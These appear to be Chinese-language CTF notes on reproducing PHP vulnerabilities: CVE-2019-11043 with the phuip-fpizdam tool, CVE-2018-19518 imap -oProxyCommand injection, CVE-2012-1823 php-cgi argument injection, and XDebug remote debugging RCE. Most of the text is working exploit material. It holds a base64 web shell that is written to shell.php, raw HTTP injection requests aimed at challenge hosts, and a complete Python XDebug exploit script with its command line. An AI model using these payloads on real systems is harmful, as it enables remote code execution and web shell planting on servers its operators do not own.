PHP
1.漏洞复现
CVE-2019-11043
影响范围:PHP-FPM + Nginx特定配置 + PHP 7.1-7.3
nginx.conf 配置:
location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }
phuip-fpizdam工具安装:
安 golang 的时候最后几个访问不到用 apt install golang --fix-missing,还是有点问题也没事
apt install golang git clone https://github.com/neex/phuip-fpizdam.git go env -w GOPROXY=https://goproxy.cn cd phuip-fpizdam go get -v && go build
漏洞利用:
./phuip-fpizdam URL/index.php
有回显命令执行(没反应就再访问一遍):URL/index?a=命令
CVE-2018-19518
影响范围:PHP 5.6.38 开启imap扩展(用于邮件收发)
准备Payload:
<?php echo `$_GET[1]`;?> base64:PD9waHAgZWNobyBgJF9HRVRbMV1gOz8+
echo "PD9waHAgZWNobyBgJF9HRVRbMV1gOz8+" | base64 -d > /var/www/html/shell.php 再base64+URL编码(好像不能有 + 和 / )
邮箱登录,抓包改包无回显命令执行
POST / HTTP/1.1 Host: 284527d7-240d-4cf9-ad55-8a85881aeb93.challenge.ctf.show Content-Length: 159 Content-Type: application/x-www-form-urlencoded Connection: close hostname=x+-oProxyCommand%3decho%09最终编码结果|base64%09-d|sh}
CVE-2012-1823
影响范围:php-cgi + php < 5.3.12、php < 5.4.2
爆源码:/index.php?-s
任意文件包含:
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: 604da5e8-97f9-4974-9b09-017a09a9f49d.challenge.ctf.show Content-Type: application/x-www-form-urlencoded Content-Length: 21 Connection: close <?php system('ls');?>
XDebug 远程调试RCE
影响范围:开启 XDebug 扩展,并配置php.ini
xdebug.remote_connect_back = 1 xdebug.remote_enable = 1
使用exp.py进行RCE(攻击机要能被回连)
#!/usr/bin/env python3 import re import sys import time import requests import argparse import socket import base64 import binascii from concurrent.futures import ThreadPoolExecutor pool = ThreadPoolExecutor(1) session = requests.session() session.headers = { 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' } def recv_xml(sock): blocks = [] data = b'' while True: try: data = data + sock.recv(1024) except socket.error as e: break if not data: break while data: eop = data.find(b'\x00') if eop < 0: break blocks.append(data[:eop]) data = data[eop+1:] if len(blocks) >= 4: break return blocks[3] def trigger(url): time.sleep(2) try: session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1) except: pass if __name__ == '__main__': parser = argparse.ArgumentParser(description='XDebug remote debug code execution.') parser.add_argument('-c', '--code', required=True, help='the code you want to execute.') parser.add_argument('-t', '--target', required=True, help='target url.') parser.add_argument('-l', '--listen', default=9000, type=int, help='local port') args = parser.parse_args() ip_port = ('0.0.0.0', args.listen) sk = socket.socket() sk.settimeout(10) sk.bind(ip_port) sk.listen(5) pool.submit(trigger, args.target) conn, addr = sk.accept() conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00'])) data = recv_xml(conn) print('[+] Recieve data: ' + data.decode()) g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I) if not g: print('[-] No result...') sys.exit(0) data = g.group(1) try: print('[+] Result: ' + base64.b64decode(data).decode()) except binascii.Error: print('[-] May be not string result...')
python exp.py -t http://xxx:8080/index.php -c 'shell_exec('id');'